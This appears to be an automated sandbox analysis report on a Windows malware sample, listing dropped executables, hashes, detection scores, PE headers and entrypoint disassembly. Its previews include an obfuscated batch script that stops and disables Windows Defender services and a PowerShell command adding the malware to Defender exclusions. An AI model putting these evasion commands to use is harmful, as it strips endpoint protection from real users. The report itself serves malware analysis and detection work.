                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):91000
                                                                                                                          Entropy (8bit):6.241345766746317
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                          MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                          SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                          SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                          SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\test.bat
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\2049.exe
                                                                                                                          File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8399
                                                                                                                          Entropy (8bit):4.665734428420432
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                                          MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                                          SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                                          SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                                          SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                                          Malicious:false
                                                                                                                          Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                                          C:\Users\user\AppData\Local\Temp\9A51.exe
                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):346624
                                                                                                                          Entropy (8bit):6.002532557908472
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:JLT8TRXp1kWwf8P/Vfrcj+EFOoxaJVaTTu:Jn6RXVwm/Vfrcj+EFOPge
                                                                                                                          MD5:700EA4A91C03D0A6E73F2E8769991D05
                                                                                                                          SHA1:2BD0C1FD1C19DA18ADC5EC802B16964BAB9946CF
                                                                                                                          SHA-256:EC7DA076FF58D306C60129793951BE70EDBCA2B48C0C9D10EA9D2E8F30A21CA5
                                                                                                                          SHA-512:664CA95591F181FBDC10AF8B5557549A7B1E25B246EF57364805F5061669D880CF30C85543D86BDC96EF215285FA1353A7989D1539DACF90C0E2AC8F94487AAE
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4...p.e.p.e.p.e....\.e.....R.e.....e.y...w.e.p.d...e....q.e.....q.e.....q.e.Richp.e.........................PE..L....y_......................p.....P.............@...........................t.....%...........................................P....`s.h?....................s.....0..................................@............................................text............................... ..`.data....io.........................@....noxi........Ps.....................@....rsrc...h?...`s..@..................@..@.reloc...#....s..$...&..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                          C:\Users\user\AppData\Local\Temp\B644.exe
                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):603136
                                                                                                                          Entropy (8bit):7.082437479108123
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:x79Dl6jlKg/rfYxZYr62zbdYLZMQQugYKM2GJc:J9Dsj5MXY/bci962
                                                                                                                          MD5:5EB13887D3DC0B841AACC50770A87213
                                                                                                                          SHA1:72302D13D2A6297DAE81CC936292354A73FBE738
                                                                                                                          SHA-256:3563D9F6B7170B84D5FC589DF6FF72F754025C8575D3D92C7FEE09446BEAC0C8
                                                                                                                          SHA-512:8E80743BDD381D18771791F19C4557141CBFCF0F987B33E58980EF766976C9EA83ED2C10F5690A8EEF71E8A9F18AD8F0A2AD474CEFD3C2310613EF1E21FA3CA6
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4...p.e.p.e.p.e....\.e.....R.e.....e.y...w.e.p.d...e....q.e.....q.e.....q.e.Richp.e.........................PE..L....5.^......................p...................@...........................x.................................................P....Pw.h?....................w.....0...................................@............................................text............................... ..`.data....io.........................@....bumid.......@w.....................@....rsrc...h?...Pw..@..................@..@.reloc...#....w..$..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xchea03.jou.psm1
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:very short file (no magic)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:U:U
                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                          Malicious:false
                                                                                                                          Preview: 1
                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dax3043b.tdv.ps1
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:very short file (no magic)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:U:U
                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                          Malicious:false
                                                                                                                          Preview: 1
                                                                                                                          C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exe
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\5508.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):91000
                                                                                                                          Entropy (8bit):6.241345766746317
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                          MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                          SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                          SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                          SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\test.bat
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\5508.exe
                                                                                                                          File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8399
                                                                                                                          Entropy (8bit):4.665734428420432
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                                          MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                                          SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                                          SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                                          SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                                          Malicious:false
                                                                                                                          Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                                          C:\Users\user\AppData\Roaming\dtrsehc
                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):347136
                                                                                                                          Entropy (8bit):6.0051803023277115
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:FeT5XzFU4bMBigvOSYXK32K/cDHgsaTuaStDUZW:FS5XzFHb/PSR32K/cDHgsaota
                                                                                                                          MD5:A9E51D671615E79CDB9CB22AA80401AD
                                                                                                                          SHA1:5C98F763CF0DE4B099B3C5B59C4B6AFD23324F02
                                                                                                                          SHA-256:83D969F48D9BA67F00E732C7DDEF343F9B23B3048228A266214A991D52856B4F
                                                                                                                          SHA-512:5468EB2D7C5782E5C912A26E88952B38D5D91F78A4DA5EA0BCFCEA15B7BAC272B158FC7662408B56BAA84B2753480FF8B9F3DDFE8BE01D1C2EBC3673A10AAEAF
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>.m.m.m..2m..m...m..m..3mq..m...m...m.m...m..6m...m...m...m...m...mRich.m................PE..L....._......................p...................@...........................t.....aY..........................................d....`s. <....................s.....0...............................`...@............................................text............................... ..`.data....io.........................@....xazum.......Ps.....................@....rsrc... <...`s..>..................@..@.reloc...#....s..$...(..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                          C:\Users\user\AppData\Roaming\dtrsehc:Zone.Identifier
                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):26
                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                          Malicious:true
                                                                                                                          Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                          C:\Users\user\AppData\Roaming\gjrsehc
                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):212992
                                                                                                                          Entropy (8bit):6.734269361613487
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:UJ+Dg6a/6BO0fFI4+uX67vtk4nNcDxzyuEpuVMO6P2+BwvHJ3/RA:FDy/6BOSFI48v2dxzyuEpynVP
                                                                                                                          MD5:73252ACB344040DDC5D9CE78A5D3A4C2
                                                                                                                          SHA1:3A16C3698CCF7940ADFB2B2A9CC8C20B1BA1D015
                                                                                                                          SHA-256:B8AC77C37DE98099DCDC5924418D445F4B11ECF326EDD41A2D49ED6EFD2A07EB
                                                                                                                          SHA-512:1541E3D7BD163A4C348C6E5C7098C6F3ADD62B1121296CA28934A69AD308C2E51CA6B841359010DA96E71FA42FD6E09F7591448433DC3B01104007808427C3DE
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 80%
                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L......^.................V...........,.......p....@..................................q......................................\...<.... ..8............................q.................................@............p..x............................text....U.......V.................. ..`.rdata...G...p...H...Z..............@..@.data...DB..........................@....cipizi.r...........................@..@.rsrc...8.... ......................@..@........................................................................................................................................................................................................................................................................................................................
                                                                                                                          C:\Users\user\Documents\20211029\PowerShell_transcript.783875.TOn_OdjW.20211029170707.txt
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5841
                                                                                                                          Entropy (8bit):5.3996347384017165
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:BZjm6qNoqDo1Zt3Zjl6qNoqDo1ZtCUWMjZjEc6qNoqDo1Ztox88TQZJZ:P11O1EzwSZ
                                                                                                                          MD5:1CF2CD27F57739E2CF6BD6FF4B702DE0
                                                                                                                          SHA1:BEB1609D55E54A5E67EBA08C646BC38AB0EA7487
                                                                                                                          SHA-256:F1270C739EC7CFCB5601AE6EF99CC6E7B2C18A6917330695ED656FCB0061B77C
                                                                                                                          SHA-512:4EDABBD3E72080EE1F1BD5B21A4DCD97EFDB4ADE079DD2429BBD6DDFB90B1CB7D5D43F4371D95CFC12204061F72A882F0A3D2B7103BE2280E1358F44C585CDEE
                                                                                                                          Malicious:false
                                                                                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20211029170712..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 783875 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user~1\AppData\Local\Temp\2049.exe -Force..Process ID: 6932..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211029170712..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user~1\AppData\Local\Temp\2049.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20211029171121..Username: computer\user..RunAs

                                                                                                                          Static File Info

                                                                                                                          General

                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Entropy (8bit):6.0051803023277115
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                          File name:SYzU0M7gx6.exe
                                                                                                                          File size:347136
                                                                                                                          MD5:a9e51d671615e79cdb9cb22aa80401ad
                                                                                                                          SHA1:5c98f763cf0de4b099b3c5b59c4b6afd23324f02
                                                                                                                          SHA256:83d969f48d9ba67f00e732c7ddef343f9b23b3048228a266214a991d52856b4f
                                                                                                                          SHA512:5468eb2d7c5782e5c912a26e88952b38d5d91f78a4da5ea0bcfcea15b7bac272b158fc7662408b56baa84b2753480ff8b9f3ddfe8be01d1c2ebc3673a10aaeaf
                                                                                                                          SSDEEP:6144:FeT5XzFU4bMBigvOSYXK32K/cDHgsaTuaStDUZW:FS5XzFHb/PSR32K/cDHgsaota
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>...m...m...m..2m...m...m...m..3mq..m...m...m...m...m..6m...m...m...m...m...mRich...m................PE..L......_...........

                                                                                                                          File Icon

                                                                                                                          Icon Hash:aedaae9ecea62aa2

                                                                                                                          Static PE Info

                                                                                                                          General

                                                                                                                          Entrypoint:0x41cbe0
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:false
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                                                          Time Stamp:0x5FA0F214 [Tue Nov 3 06:00:52 2020 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:5
                                                                                                                          OS Version Minor:1
                                                                                                                          File Version Major:5
                                                                                                                          File Version Minor:1
                                                                                                                          Subsystem Version Major:5
                                                                                                                          Subsystem Version Minor:1
                                                                                                                          Import Hash:e522cb867082e04c7a4b61561f8516ce

                                                                                                                          Entrypoint Preview

                                                                                                                          Instruction
                                                                                                                          mov edi, edi
                                                                                                                          push ebp
                                                                                                                          mov ebp, esp
                                                                                                                          call 00007FF19C82E0DBh
                                                                                                                          call 00007FF19C828F26h
                                                                                                                          pop ebp
                                                                                                                          ret
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          mov edi, edi
                                                                                                                          push ebp
                                                                                                                          mov ebp, esp
                                                                                                                          push FFFFFFFEh
                                                                                                                          push 0043CA70h
                                                                                                                          push 00421B00h
                                                                                                                          mov eax, dword ptr fs:[00000000h]
                                                                                                                          push eax
                                                                                                                          add esp, FFFFFF98h
                                                                                                                          push ebx
                                                                                                                          push esi
                                                                                                                          push edi
                                                                                                                          mov eax, dword ptr [0043E494h]
                                                                                                                          xor dword ptr [ebp-08h], eax
                                                                                                                          xor eax, ebp
                                                                                                                          push eax
                                                                                                                          lea eax, dword ptr [ebp-10h]
                                                                                                                          mov dword ptr fs:[00000000h], eax
                                                                                                                          mov dword ptr [ebp-18h], esp
                                                                                                                          mov dword ptr [ebp-70h], 00000000h
                                                                                                                          lea eax, dword ptr [ebp-60h]
                                                                                                                          push eax
                                                                                                                          call dword ptr [00401070h]
                                                                                                                          cmp dword ptr [02B339C4h], 00000000h
                                                                                                                          jne 00007FF19C828F20h
                                                                                                                          push 00000000h
                                                                                                                          push 00000000h
                                                                                                                          push 00000001h
                                                                                                                          push 00000000h
                                                                                                                          call dword ptr [004010FCh]
                                                                                                                          call 00007FF19C8290A3h
                                                                                                                          mov dword ptr [ebp-6Ch], eax
                                                                                                                          call 00007FF19C83138Bh
                                                                                                                          test eax, eax
                                                                                                                          jne 00007FF19C828F1Ch
                                                                                                                          push 0000001Ch
                                                                                                                          call 00007FF19C829060h
                                                                                                                          add esp, 04h
                                                                                                                          call 00007FF19C830CE8h
                                                                                                                          test eax, eax
                                                                                                                          jne 00007FF19C828F1Ch
                                                                                                                          push 00000010h
                                                                                                                          call 00007FF19C82904Dh
                                                                                                                          add esp, 04h
                                                                                                                          push 00000001h
                                                                                                                          call 00007FF19C830C33h
                                                                                                                          add esp, 04h
                                                                                                                          call 00007FF19C82EA4Bh
                                                                                                                          mov dword ptr [ebp-04h], 00000000h
                                                                                                                          call 00007FF19C82D42Fh
                                                                                                                          test eax, eax

                                                                                                                          Rich Headers

                                                                                                                          Programming Language:
                                                                                                                          • [LNK] VS2010 build 30319
                                                                                                                          • [ASM] VS2010 build 30319
                                                                                                                          • [ C ] VS2010 build 30319
                                                                                                                          • [C++] VS2010 build 30319
                                                                                                                          • [RES] VS2010 build 30319
                                                                                                                          • [IMP] VS2008 SP1 build 30729

                                                                                                                          Data Directories

                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x64.text
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x27360000x3c20.rsrc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x273a0000x1b88.reloc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x12300x1c.text
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1c0600x40.text
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x10000x1dc.text
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                          Sections

                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                          .text0x10000x3cbd80x3cc00False0.599520961934data6.992417528IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                          .data0x3e0000x26f69c80x1600unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                          .xazum0x27350000x2e50x400False0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                          .rsrc0x27360000x3c200x3e00False0.725302419355data6.29507248858IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .reloc0x273a0000x123f00x12400False0.0813489940068data1.05184669978IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                          Resources

                                                                                                                          NameRVASizeTypeLanguageCountry
                                                                                                                          RT_ICON0x27362400x25a8dataSpanishParaguay
                                                                                                                          RT_ICON0x27387e80x10a8dataSpanishParaguay
                                                                                                                          RT_STRING0x27399d00x96dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                          RT_STRING0x2739a680x1b6dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                          RT_ACCELERATOR0x27399200x90dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                          RT_ACCELERATOR0x27398b80x68dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                          RT_GROUP_ICON0x27398900x22dataSpanishParaguay
                                                                                                                          None0x27399c00xadataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                          None0x27399b00xadataDivehi; Dhivehi; MaldivianMaldives

                                                                                                                          Imports

                                                                                                                          DLLImport
